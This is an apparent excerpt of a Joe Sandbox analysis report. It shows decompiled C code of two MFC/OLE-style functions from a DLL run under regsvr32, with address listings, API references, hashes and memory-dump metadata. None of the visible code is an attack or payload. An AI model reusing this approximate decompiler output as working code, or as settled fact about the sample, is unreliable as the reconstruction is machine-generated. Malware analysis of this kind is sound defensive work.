                                                                                                                • Opcode ID: b457f8b68ae8ebe2aa2b29e7c3b07adf861c146a59385abbc08cb9b12b5b583a
                                                                                                                • Instruction ID: 6fa32537bea77ea401c086acbfad8471d090d4f731cd6c3d02efb41ce348b637
                                                                                                                • Opcode Fuzzy Hash: b457f8b68ae8ebe2aa2b29e7c3b07adf861c146a59385abbc08cb9b12b5b583a
                                                                                                                • Instruction Fuzzy Hash: 6711BF71A40268EBEB00DBA0DD89FAE7BB8EF46781F400055FA02A6181DFB49D41CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1003A2DF(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				CHAR* _t121;
                                                                                                                				int _t122;
                                                                                                                				CHAR* _t127;
                                                                                                                				CHAR* _t135;
                                                                                                                				CHAR* _t140;
                                                                                                                				signed short* _t142;
                                                                                                                				CHAR* _t144;
                                                                                                                				CHAR* _t148;
                                                                                                                				CHAR* _t151;
                                                                                                                				signed int _t158;
                                                                                                                				signed int _t169;
                                                                                                                				CHAR* _t173;
                                                                                                                				void* _t176;
                                                                                                                				void* _t179;
                                                                                                                				signed short _t181;
                                                                                                                				signed int _t183;
                                                                                                                				intOrPtr _t185;
                                                                                                                				CHAR* _t188;
                                                                                                                				int _t190;
                                                                                                                				char* _t193;
                                                                                                                				void* _t194;
                                                                                                                				void* _t195;
                                                                                                                				CHAR* _t196;
                                                                                                                				char* _t198;
                                                                                                                				void* _t199;
                                                                                                                				long long _t204;
                                                                                                                
                                                                                                                				_t199 = __eflags;
                                                                                                                				_t185 = __edx;
                                                                                                                				_push(0x50);
                                                                                                                				E100476EC(0x10090ee9, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
                                                                                                                				E1001E397(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
                                                                                                                				_t173 =  *(_t195 + 8);
                                                                                                                				_t121 = _t173[8];
                                                                                                                				_t187 = 0;
                                                                                                                				 *(_t195 - 4) = 0;
                                                                                                                				 *(_t195 - 0x1d) = 0;
                                                                                                                				 *(_t195 - 0x18) = _t121;
                                                                                                                				if(_t121 == 0) {
                                                                                                                					 *(_t195 - 0x18) = _t195 - 0x1d;
                                                                                                                				}
                                                                                                                				_t122 = lstrlenA( *(_t195 - 0x18));
                                                                                                                				_t201 =  *(_t195 + 0xc) & 0x0000000c;
                                                                                                                				_t190 = _t122;
                                                                                                                				 *(_t195 - 0x28) = _t173[0x10];
                                                                                                                				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
                                                                                                                				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
                                                                                                                					L11:
                                                                                                                					_t191 =  *(_t195 + 0x14);
                                                                                                                					_push( *(_t191 + 8) << 4);
                                                                                                                					_t127 = L10001492(_t173, _t185, _t187, _t191, __eflags);
                                                                                                                					__eflags = _t127;
                                                                                                                					_pop(_t176);
                                                                                                                					if(_t127 != 0) {
                                                                                                                						_t191 =  *(_t191 + 8);
                                                                                                                						__eflags = _t191 - 0x7ffffff;
                                                                                                                						if(_t191 > 0x7ffffff) {
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						_t192 = _t191 << 4;
                                                                                                                						E10048380(_t191 << 4);
                                                                                                                						 *(_t195 - 0x10) = _t196;
                                                                                                                						 *(_t195 - 0x1c) = _t196;
                                                                                                                						E10049170(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
                                                                                                                						_t198 =  &(_t196[0xc]);
                                                                                                                						_t187 = E100395F6(_t173, _t176, _t187, _t192, _t195,  *(_t195 - 0x18),  *(_t195 - 0x24));
                                                                                                                						_t49 = _t187 + 0x10; // 0x10
                                                                                                                						_t191 = _t49;
                                                                                                                						_push(_t49);
                                                                                                                						_t135 = L10001492(_t173, _t185, _t187, _t49, __eflags);
                                                                                                                						__eflags = _t135;
                                                                                                                						if(_t135 == 0) {
                                                                                                                							L4:
                                                                                                                							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                							if( *(_t195 - 0x2c) == 0) {
                                                                                                                								L7:
                                                                                                                								L55:
                                                                                                                								return E10047748(_t173, _t187, _t191);
                                                                                                                							}
                                                                                                                							_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                							_push(0);
                                                                                                                							L6:
                                                                                                                							E1001D714();
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						E10048380(_t191);
                                                                                                                						 *(_t195 - 0x10) = _t198;
                                                                                                                						_t173 = 0;
                                                                                                                						_t193 = _t198;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x58)) = 0x1009ee28;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x54)) = 0;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x48)) = 0;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
                                                                                                                						 *((intOrPtr*)(_t195 - 0x50)) = 0;
                                                                                                                						_push(_t195 - 0x58);
                                                                                                                						_push( *(_t195 - 0x1c));
                                                                                                                						_push( *((intOrPtr*)(_t195 + 0x18)));
                                                                                                                						 *(_t195 - 4) = 1;
                                                                                                                						_push( *(_t195 + 0x14));
                                                                                                                						_push( *(_t195 - 0x24));
                                                                                                                						_push(_t195 - 0x44);
                                                                                                                						_push( *(_t195 - 0x18));
                                                                                                                						_push(_t193);
                                                                                                                						_t140 = E10039FF7(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
                                                                                                                						__eflags = _t140;
                                                                                                                						 *(_t195 - 0x18) = _t140;
                                                                                                                						if(_t140 != 0) {
                                                                                                                							L26:
                                                                                                                							_t191 =  *(_t195 + 0x14);
                                                                                                                							_t187 = 0;
                                                                                                                							__eflags =  *(_t191 + 8);
                                                                                                                							if( *(_t191 + 8) <= 0) {
                                                                                                                								L29:
                                                                                                                								__eflags =  *(_t195 - 0x18);
                                                                                                                								_t179 = _t195 - 0x58;
                                                                                                                								if( *(_t195 - 0x18) == 0) {
                                                                                                                									E10039D42(_t179);
                                                                                                                									_t142 =  *(_t195 + 0x10);
                                                                                                                									__eflags = _t142;
                                                                                                                									if(_t142 == 0) {
                                                                                                                										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
                                                                                                                										__eflags = _t144;
                                                                                                                										if(_t144 == 0) {
                                                                                                                											__imp__#6(_t173);
                                                                                                                											L52:
                                                                                                                											 *(_t195 - 4) = 0;
                                                                                                                											E10039D98(_t195 - 0x58);
                                                                                                                											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                											__eflags =  *(_t195 - 0x2c);
                                                                                                                											if( *(_t195 - 0x2c) != 0) {
                                                                                                                												_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                												_push(0);
                                                                                                                												E1001D714();
                                                                                                                											}
                                                                                                                											__eflags = 0;
                                                                                                                											goto L55;
                                                                                                                										}
                                                                                                                										_t148 = _t144 - 1;
                                                                                                                										__eflags = _t148;
                                                                                                                										if(_t148 == 0) {
                                                                                                                											L48:
                                                                                                                											__eflags = _t173;
                                                                                                                											if(_t173 != 0) {
                                                                                                                												 *((intOrPtr*)( *_t173 + 8))(_t173);
                                                                                                                											}
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										_t151 = _t148 - 3;
                                                                                                                										__eflags = _t151;
                                                                                                                										if(_t151 == 0) {
                                                                                                                											__imp__#9(_t195 - 0x44);
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										__eflags = _t151 != 1;
                                                                                                                										if(_t151 != 1) {
                                                                                                                											goto L52;
                                                                                                                										}
                                                                                                                										goto L48;
                                                                                                                									}
                                                                                                                									_t181 =  *(_t195 - 0x24);
                                                                                                                									 *_t142 = _t181;
                                                                                                                									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
                                                                                                                									__eflags = _t183 - 0x13;
                                                                                                                									if(_t183 > 0x13) {
                                                                                                                										goto L52;
                                                                                                                									}
                                                                                                                									switch( *((intOrPtr*)(_t183 * 4 +  &M1003A5EF))) {
                                                                                                                										case 0:
                                                                                                                											L41:
                                                                                                                											 *(__eax + 8) = __bx;
                                                                                                                											goto L52;
                                                                                                                										case 1:
                                                                                                                											 *(__eax + 8) = __ebx;
                                                                                                                											goto L52;
                                                                                                                										case 2:
                                                                                                                											 *(__eax + 8) =  *(__ebp - 0x44);
                                                                                                                											goto L52;
                                                                                                                										case 3:
                                                                                                                											 *(__eax + 8) =  *(__ebp - 0x44);
                                                                                                                											goto L52;
                                                                                                                										case 4:
                                                                                                                											__ecx =  *(__ebp - 0x44);
                                                                                                                											 *(__eax + 8) =  *(__ebp - 0x44);
                                                                                                                											__ecx =  *(__ebp - 0x40);
                                                                                                                											 *(__eax + 0xc) = __ecx;
                                                                                                                											goto L52;
                                                                                                                										case 5:
                                                                                                                											__bx =  ~__bx;
                                                                                                                											asm("sbb ebx, ebx");
                                                                                                                											goto L41;
                                                                                                                										case 6:
                                                                                                                											__esi = __ebp - 0x44;
                                                                                                                											__edi = __eax;
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											asm("movsd");
                                                                                                                											goto L52;
                                                                                                                										case 7:
                                                                                                                											goto L52;
                                                                                                                										case 8:
                                                                                                                											_t142[4] = _t173;
                                                                                                                											goto L52;
                                                                                                                									}
                                                                                                                								}
                                                                                                                								 *(_t195 - 4) = 0;
                                                                                                                								E10039D98(_t179);
                                                                                                                								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                								__eflags =  *(_t195 - 0x2c);
                                                                                                                								if( *(_t195 - 0x2c) != 0) {
                                                                                                                									_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                									_push(0);
                                                                                                                									E1001D714();
                                                                                                                								}
                                                                                                                								goto L55;
                                                                                                                							}
                                                                                                                							do {
                                                                                                                								__imp__#9( *(_t195 - 0x1c));
                                                                                                                								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
                                                                                                                								_t187 = _t187 + 1;
                                                                                                                								__eflags = _t187 -  *(_t191 + 8);
                                                                                                                							} while (_t187 <  *(_t191 + 8));
                                                                                                                							goto L29;
                                                                                                                						}
                                                                                                                						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
                                                                                                                						__eflags = _t158 - 4;
                                                                                                                						_push(_t187);
                                                                                                                						_push(_t193);
                                                                                                                						_push( *(_t195 - 0x28));
                                                                                                                						 *(_t195 - 4) = 2;
                                                                                                                						if(_t158 == 4) {
                                                                                                                							E10040466();
                                                                                                                							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
                                                                                                                							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
                                                                                                                							L25:
                                                                                                                							 *(_t195 - 4) = 1;
                                                                                                                							goto L26;
                                                                                                                						}
                                                                                                                						__eflags = _t158 - 5;
                                                                                                                						if(_t158 == 5) {
                                                                                                                							L23:
                                                                                                                							E10040466();
                                                                                                                							 *((long long*)(_t195 - 0x44)) = _t204;
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                						__eflags = _t158 - 7;
                                                                                                                						if(_t158 == 7) {
                                                                                                                							goto L23;
                                                                                                                						}
                                                                                                                						__eflags = _t158 + 0xffffffec - 1;
                                                                                                                						if(_t158 + 0xffffffec > 1) {
                                                                                                                							_t173 = E10040466();
                                                                                                                						} else {
                                                                                                                							 *((intOrPtr*)(_t195 - 0x44)) = E10040466();
                                                                                                                							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
                                                                                                                						}
                                                                                                                						goto L25;
                                                                                                                					}
                                                                                                                					L12:
                                                                                                                					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
                                                                                                                					__eflags =  *(_t195 - 0x2c) - _t187;
                                                                                                                					if( *(_t195 - 0x2c) == _t187) {
                                                                                                                						goto L7;
                                                                                                                					}
                                                                                                                					_push( *((intOrPtr*)(_t195 - 0x30)));
                                                                                                                					_push(_t187);
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                				_t19 = _t190 + 3; // 0x3
                                                                                                                				_t187 = _t19;
                                                                                                                				_push(_t19);
                                                                                                                				if(L10001492(_t173, _t185, _t19, _t190, _t201) != 0) {
                                                                                                                					E10048380(_t187);
                                                                                                                					 *(_t195 - 0x10) = _t196;
                                                                                                                					_t188 = _t196;
                                                                                                                					_t26 = _t190 + 3; // 0x3
                                                                                                                					E1000A7FB(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
                                                                                                                					_t169 = _t173[0xc] & 0x0000ffff;
                                                                                                                					_t196 =  &(_t196[0x10]);
                                                                                                                					__eflags = _t169 - 8;
                                                                                                                					 *(_t195 - 0x18) = _t188;
                                                                                                                					if(_t169 == 8) {
                                                                                                                						_t169 = 0xe;
                                                                                                                					}
                                                                                                                					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
                                                                                                                					_t188[_t190] = 0xff;
                                                                                                                					_t194 = _t190 + 1;
                                                                                                                					_t188[_t194] = _t169;
                                                                                                                					_t188[_t194 + 1] = 0;
                                                                                                                					 *(_t195 - 0x28) = _t173[0x14];
                                                                                                                					_t187 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				goto L4;
                                                                                                                			}





























                                                                                                                0x1003a548
                                                                                                                0x00000000
                                                                                                                0x1003a577
                                                                                                                0x1003a577
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a588
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a565
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a56d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a554
                                                                                                                0x1003a557
                                                                                                                0x1003a55a
                                                                                                                0x1003a55d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a572
                                                                                                                0x1003a575
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a57d
                                                                                                                0x1003a580
                                                                                                                0x1003a582
                                                                                                                0x1003a583
                                                                                                                0x1003a584
                                                                                                                0x1003a585
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a54f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a548
                                                                                                                0x1003a4e0
                                                                                                                0x1003a4e4
                                                                                                                0x1003a4e9
                                                                                                                0x1003a4ed
                                                                                                                0x1003a4f1
                                                                                                                0x1003a4f3
                                                                                                                0x1003a4f6
                                                                                                                0x1003a4f8
                                                                                                                0x1003a4f8
                                                                                                                0x00000000
                                                                                                                0x1003a4fd
                                                                                                                0x1003a4c4
                                                                                                                0x1003a4c7
                                                                                                                0x1003a4cd
                                                                                                                0x1003a4d1
                                                                                                                0x1003a4d2
                                                                                                                0x1003a4d2
                                                                                                                0x00000000
                                                                                                                0x1003a4c4
                                                                                                                0x1003a45b
                                                                                                                0x1003a45f
                                                                                                                0x1003a462
                                                                                                                0x1003a463
                                                                                                                0x1003a464
                                                                                                                0x1003a467
                                                                                                                0x1003a46b
                                                                                                                0x1003a49f
                                                                                                                0x1003a4a4
                                                                                                                0x1003a4aa
                                                                                                                0x1003a4ad
                                                                                                                0x1003a4ad
                                                                                                                0x00000000
                                                                                                                0x1003a4ad
                                                                                                                0x1003a46d
                                                                                                                0x1003a470
                                                                                                                0x1003a495
                                                                                                                0x1003a495
                                                                                                                0x1003a49a
                                                                                                                0x00000000
                                                                                                                0x1003a49a
                                                                                                                0x1003a472
                                                                                                                0x1003a475
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a47a
                                                                                                                0x1003a47d
                                                                                                                0x1003a491
                                                                                                                0x1003a47f
                                                                                                                0x1003a484
                                                                                                                0x1003a487
                                                                                                                0x1003a487
                                                                                                                0x00000000
                                                                                                                0x1003a47d
                                                                                                                0x1003a3b9
                                                                                                                0x1003a3b9
                                                                                                                0x1003a3bd
                                                                                                                0x1003a3c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003a3c2
                                                                                                                0x1003a3c5
                                                                                                                0x00000000
                                                                                                                0x1003a3c5
                                                                                                                0x1003a333
                                                                                                                0x1003a333
                                                                                                                0x1003a336
                                                                                                                0x1003a33f
                                                                                                                0x1003a361
                                                                                                                0x1003a366
                                                                                                                0x1003a369
                                                                                                                0x1003a36f
                                                                                                                0x1003a374
                                                                                                                0x1003a379
                                                                                                                0x1003a37d
                                                                                                                0x1003a380
                                                                                                                0x1003a384
                                                                                                                0x1003a387
                                                                                                                0x1003a38b
                                                                                                                0x1003a38b
                                                                                                                0x1003a38c
                                                                                                                0x1003a390
                                                                                                                0x1003a394
                                                                                                                0x1003a395
                                                                                                                0x1003a398
                                                                                                                0x1003a3a0
                                                                                                                0x1003a3a3
                                                                                                                0x1003a3a3
                                                                                                                0x00000000
                                                                                                                0x1003a3a3
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 1003A2E6
                                                                                                                • lstrlenA.KERNEL32(00000000,000000FF,00000050,1002AA26,00000000,00000001,?,?,000000FF,?,?,?), ref: 1003A318
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1003A361
                                                                                                                  • Part of subcall function 1000A7FB: _memcpy_s.LIBCMT ref: 1000A80B
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1003A3D8
                                                                                                                • _memset.LIBCMT ref: 1003A3E8
                                                                                                                • __alloca_probe_16.LIBCMT ref: 1003A411
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1003A4C7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2586305615-0
                                                                                                                • Opcode ID: 0f9be9321993a377763dde6a88daadc2fa287c8f5576e8f6b934abec6b28c4dd
                                                                                                                • Instruction ID: 8a55a60cb0bb44ec9ac80b342bc5a56f9bc70aa257b53d36690aa41eb9699fb4
                                                                                                                • Opcode Fuzzy Hash: 0f9be9321993a377763dde6a88daadc2fa287c8f5576e8f6b934abec6b28c4dd
                                                                                                                • Instruction Fuzzy Hash: 86A18B31C00649DFCF12DFA4C885AEEBBB0FF46362F204159E915AB291D735AE81DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1000B0A9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t68;
                                                                                                                				struct HMETAFILE__* _t69;
                                                                                                                				void* _t74;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                				struct HMETAFILE__* _t84;
                                                                                                                				void* _t85;
                                                                                                                				void* _t87;
                                                                                                                				void* _t89;
                                                                                                                				struct HMETAFILE__* _t90;
                                                                                                                				void* _t91;
                                                                                                                				void* _t95;
                                                                                                                				void* _t100;
                                                                                                                				void* _t103;
                                                                                                                				void* _t104;
                                                                                                                				WCHAR* _t105;
                                                                                                                				struct HMETAFILE__* _t108;
                                                                                                                				void* _t111;
                                                                                                                				void* _t114;
                                                                                                                				void* _t117;
                                                                                                                				void* _t118;
                                                                                                                				void* _t119;
                                                                                                                				struct HMETAFILE__* _t121;
                                                                                                                				void _t128;
                                                                                                                				void* _t147;
                                                                                                                				void* _t153;
                                                                                                                				void* _t161;
                                                                                                                
                                                                                                                				_push(0x5c);
                                                                                                                				E100476B6(0x1008dd90, __ebx, __edi, __esi);
                                                                                                                				_t157 =  *(_t161 + 0xc);
                                                                                                                				_t153 =  *(_t161 + 0x10);
                                                                                                                				if( *_t157 != 0) {
                                                                                                                					L10:
                                                                                                                					_t68 =  *_t153 - 1;
                                                                                                                					if(_t68 == 0) {
                                                                                                                						_t69 = E1000A992(_t128,  *(_t157 + 4),  *(_t153 + 4));
                                                                                                                						__eflags = _t69;
                                                                                                                						if(_t69 == 0) {
                                                                                                                							goto L19;
                                                                                                                						} else {
                                                                                                                							 *(_t157 + 4) = _t69;
                                                                                                                							goto L37;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t74 = _t68 - 1;
                                                                                                                						if(_t74 == 0) {
                                                                                                                							_push( *(_t157 + 4));
                                                                                                                							E1000B053(0, _t161 - 0x60, _t153, _t157, __eflags);
                                                                                                                							_push( *(_t157 + 4));
                                                                                                                							 *((intOrPtr*)(_t161 - 4)) = 0;
                                                                                                                							E1000B053(0, _t161 - 0x5c, _t153, _t157, __eflags);
                                                                                                                							asm("sbb esi, esi");
                                                                                                                							asm("sbb edi, edi");
                                                                                                                							_t157 = CopyFileA(_t153,  ~( *(_t157 + 4)) &  *(_t161 - 0x5c), 0);
                                                                                                                							L100013E3( *(_t161 - 0x5c) + 0xfffffff0, _t147);
                                                                                                                							L100013E3( *((intOrPtr*)(_t161 - 0x60)) + 0xfffffff0, _t147);
                                                                                                                						} else {
                                                                                                                							_t82 = _t74;
                                                                                                                							if(_t82 == 0) {
                                                                                                                								_t83 =  *(_t153 + 4);
                                                                                                                								_t84 =  *((intOrPtr*)( *_t83 + 0x30))(_t83, _t161 - 0x58, 1);
                                                                                                                								__eflags = _t84;
                                                                                                                								if(_t84 != 0) {
                                                                                                                									goto L19;
                                                                                                                								} else {
                                                                                                                									_t85 =  *(_t157 + 4);
                                                                                                                									 *((intOrPtr*)(_t161 - 0x64)) = 0;
                                                                                                                									 *((intOrPtr*)( *_t85 + 0x14))(_t85, 0, 0, 0, 0);
                                                                                                                									_t87 =  *(_t153 + 4);
                                                                                                                									 *((intOrPtr*)( *_t87 + 0x14))(_t87, 0, 0, 0, 0);
                                                                                                                									_t89 =  *(_t153 + 4);
                                                                                                                									_t90 =  *((intOrPtr*)( *_t89 + 0x1c))(_t89,  *(_t157 + 4),  *((intOrPtr*)(_t161 - 0x50)),  *((intOrPtr*)(_t161 - 0x4c)), 0, 0);
                                                                                                                									__eflags = _t90;
                                                                                                                									if(_t90 != 0) {
                                                                                                                										goto L19;
                                                                                                                									} else {
                                                                                                                										_t91 =  *(_t157 + 4);
                                                                                                                										_t157 = 0;
                                                                                                                										 *((intOrPtr*)( *_t91 + 0x14))(_t91, 0, 0, 0, 0);
                                                                                                                										_t153 =  *(_t153 + 4);
                                                                                                                										 *((intOrPtr*)( *_t153 + 0x14))(_t153, 0, 0, 0, 0);
                                                                                                                										goto L37;
                                                                                                                									}
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_t95 = _t82 - 4;
                                                                                                                								if(_t95 == 0) {
                                                                                                                									_t153 =  *(_t153 + 4);
                                                                                                                									 *((intOrPtr*)( *_t153 + 0x1c))(_t153, 0, 0, 0,  *(_t157 + 4));
                                                                                                                									asm("sbb eax, eax");
                                                                                                                								} else {
                                                                                                                									_t100 = _t95 - 8;
                                                                                                                									if(_t100 == 0) {
                                                                                                                										L16:
                                                                                                                										if( *(_t157 + 4) != 0) {
                                                                                                                											goto L19;
                                                                                                                										} else {
                                                                                                                											__imp__OleDuplicateData( *(_t153 + 4),  *((intOrPtr*)(_t161 + 8)), 0);
                                                                                                                											 *(_t157 + 4) = _t100;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t100 = _t100 - 0x30;
                                                                                                                										if(_t100 != 0) {
                                                                                                                											goto L19;
                                                                                                                										} else {
                                                                                                                											goto L16;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t128 =  *_t153;
                                                                                                                					_t103 = _t128 - 1;
                                                                                                                					if(_t103 == 0) {
                                                                                                                						L8:
                                                                                                                						 *_t157 = _t128;
                                                                                                                						goto L9;
                                                                                                                					} else {
                                                                                                                						_t104 = _t103 - 1;
                                                                                                                						if(_t104 == 0) {
                                                                                                                							 *_t157 = 2;
                                                                                                                							_t105 =  *(_t153 + 4);
                                                                                                                							__eflags = _t105;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t105 = E1000A069(0, _t128, _t153, _t157, __eflags);
                                                                                                                							}
                                                                                                                							 *((intOrPtr*)(_t161 - 0x60)) = lstrlenW(_t105);
                                                                                                                							_t108 = E1000A7A4(_t128, __eflags, _t106 + 1, 2);
                                                                                                                							__eflags = _t108;
                                                                                                                							 *(_t157 + 4) = _t108;
                                                                                                                							if(_t108 == 0) {
                                                                                                                								goto L19;
                                                                                                                							} else {
                                                                                                                								E1000A7FB(_t153, _t157, _t161, _t108,  *((intOrPtr*)(_t161 - 0x60)) +  *((intOrPtr*)(_t161 - 0x60)) + 2,  *(_t153 + 4),  *((intOrPtr*)(_t161 - 0x60)) +  *((intOrPtr*)(_t161 - 0x60)) + 2);
                                                                                                                								goto L37;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t111 = _t104;
                                                                                                                							if(_t111 == 0) {
                                                                                                                								_t153 =  *(_t153 + 4);
                                                                                                                								 *(_t157 + 4) = _t153;
                                                                                                                								 *((intOrPtr*)( *_t153 + 4))(_t153);
                                                                                                                								 *_t157 = 4;
                                                                                                                								goto L37;
                                                                                                                							} else {
                                                                                                                								_t114 = _t111 - 4;
                                                                                                                								if(_t114 == 0) {
                                                                                                                									_t153 =  *(_t153 + 4);
                                                                                                                									 *(_t157 + 4) = _t153;
                                                                                                                									 *((intOrPtr*)( *_t153 + 4))(_t153);
                                                                                                                									 *_t157 = 8;
                                                                                                                									goto L37;
                                                                                                                								} else {
                                                                                                                									_t117 = _t114 - 8;
                                                                                                                									if(_t117 == 0) {
                                                                                                                										 *_t157 = 0x10;
                                                                                                                										L9:
                                                                                                                										 *(_t157 + 4) = 0;
                                                                                                                										goto L10;
                                                                                                                									} else {
                                                                                                                										_t118 = _t117 - 0x10;
                                                                                                                										if(_t118 == 0) {
                                                                                                                											_t119 = E1000A992(_t128, 0,  *(_t153 + 4));
                                                                                                                											__eflags = _t119;
                                                                                                                											 *(_t161 - 0x5c) = _t119;
                                                                                                                											if(_t119 != 0) {
                                                                                                                												_t153 = GlobalLock(_t119);
                                                                                                                												_t121 = CopyMetaFileA( *(_t153 + 0xc), 0);
                                                                                                                												__eflags = _t121;
                                                                                                                												 *(_t153 + 0xc) = _t121;
                                                                                                                												if(_t121 != 0) {
                                                                                                                													_t153 =  *(_t161 - 0x5c);
                                                                                                                													GlobalUnlock(_t153);
                                                                                                                													 *(_t157 + 4) = _t153;
                                                                                                                													 *_t157 = 0x20;
                                                                                                                													L37:
                                                                                                                													__eflags = 1;
                                                                                                                												} else {
                                                                                                                													GlobalUnlock( *(_t161 - 0x5c));
                                                                                                                													GlobalFree( *(_t161 - 0x5c));
                                                                                                                													goto L19;
                                                                                                                												}
                                                                                                                											} else {
                                                                                                                												goto L19;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											if(_t118 == 0x20) {
                                                                                                                												goto L8;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E10047739(0, _t153, _t157);
                                                                                                                			}






























                                                                                                                0x1000b0d1
                                                                                                                0x1000b1c5
                                                                                                                0x1000b1c8
                                                                                                                0x1000b1ce
                                                                                                                0x1000b1d1
                                                                                                                0x00000000
                                                                                                                0x1000b0d7
                                                                                                                0x1000b0d7
                                                                                                                0x1000b0da
                                                                                                                0x1000b1ae
                                                                                                                0x1000b1b1
                                                                                                                0x1000b1b7
                                                                                                                0x1000b1ba
                                                                                                                0x00000000
                                                                                                                0x1000b0e0
                                                                                                                0x1000b0e0
                                                                                                                0x1000b0e3
                                                                                                                0x1000b1a3
                                                                                                                0x1000b0f5
                                                                                                                0x1000b0f5
                                                                                                                0x00000000
                                                                                                                0x1000b0e9
                                                                                                                0x1000b0e9
                                                                                                                0x1000b0ec
                                                                                                                0x1000b14a
                                                                                                                0x1000b14f
                                                                                                                0x1000b151
                                                                                                                0x1000b154
                                                                                                                0x1000b164
                                                                                                                0x1000b16a
                                                                                                                0x1000b170
                                                                                                                0x1000b172
                                                                                                                0x1000b175
                                                                                                                0x1000b18b
